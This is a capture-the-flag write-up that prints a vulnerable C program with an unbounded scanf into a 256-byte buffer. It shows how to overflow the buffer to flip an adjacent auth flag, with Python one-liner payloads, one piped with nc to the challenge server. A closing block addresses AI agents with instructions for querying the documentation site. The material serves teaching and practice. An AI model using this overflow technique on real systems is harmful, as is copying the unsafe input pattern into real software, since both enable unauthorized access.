# Super Secret Password ## Source Code ```c #include #include #include typedef enum {false, true} bool; static const char secretPass[] = "SuperSecureAndSuperSecretPassword!"; int flag() { system("/bin/cat flag.txt"); fflush(NULL); } bool password_match(char *pass) { // return true if password match if (strncmp(pass, secretPass, strlen(secretPass)) == 0) { return true; } return false; } void authentigate() { printf("WELCOME TO THE A U T H E N T I G A T E\n"); printf("\n"); bool auth_enabled = false; char pass[256]; printf("Enter the correct password to be allowed through the gate: \n"); fflush(NULL); scanf("%s", &pass[0]); if (!auth_enabled) { printf("Sorry, the AuthentiGate is closed, authentication is not currently enabled!\n"); fflush(NULL); return; } if (password_match(&pass[0])) { printf("Congratulations! You have opened the AuthentiGate and here is your reward!\n"); flag(); } else { printf("ERROR, INCORRECT PASSWORD!\n"); fflush(NULL); } } int main() { setbuf(stdin, NULL); setbuf(stdout, NULL); authentigate(); return 0; } ``` ## Big brain solution The goal here is to furfill two if statments, the first one checks a bool value which is hardcoded to false, if it returns true we pass it, otherwise the program exits. ```c if (!auth_enabled) { printf("Sorry, the AuthentiGate is closed, authentication is not currently enabled!\n"); fflush(NULL); return; } ``` The second if checks the password, and it needs to match "SuperSecureAndSuperSecretPassword!". ```c if (password_match(&pass[0])) { printf("Congratulations! You have opened the AuthentiGate and here is your reward!\n"); flag(); } else { printf("ERROR, INCORRECT PASSWORD!\n"); fflush(NULL); } } ``` The buffer where our password is stored is initialized right above the bool value and the input size is unrestricted, which means we can overflow the buffer and overwrite the bool value with true.
```c bool auth_enabled = false; char pass[256]; ``` We can patch the source to print the pointers of both variables to calculate the offset. by simply adding the following lines after both variables are initialized: ```c printf("pass @ %p\n",pass); printf("auth_enabled @ %p\n\n",&auth_enabled); ``` After compiling and running the bin we can calculate the offset. ![](/files/-MgaxB2858qR9U6rb-uj) Great, the offset is 268 bytes, that means we can use a 268 sized junk to push a true value into auth\_enabled. If we send the following input: ```c python -c 'print("A"*268+"\x01")'|./chall ``` We'll bypass the first if statment. ![](/files/-MgayKOi-Px5m0OS49GE) This means we hit the second if. Now we just got to input the correct password prepended to our padding to match the correct password. Don't forget to correct the padding size by subtracting the length of the password witch is 34 bytes. ```c python -c 'print("SuperSecureAndSuperSecretPassword!"+"A"*(268-34)+"\x01")'|./chall ``` And the program trys to read the flag. ![](/files/-Mgaz_Du4vVrKqSbRTQS) Now we just gotta send the input to the remote instance. ![](/files/-Mgb-8mC5fx3hfguUX_Y) ## Small brain solution Every thing other than false returns true so getting the perfectly right offset is pointless. ```c python -c 'print("SuperSecureAndSuperSecretPassword!"*8)'|nc 52.207.153.238 1337 ``` What could make the challenge better would be adding a string compare instead of bool which would prevent one from solving without calculating the offset. --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://0xten.gitbook.io/public/uhc/quals/8th-edition/super-secret-password.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.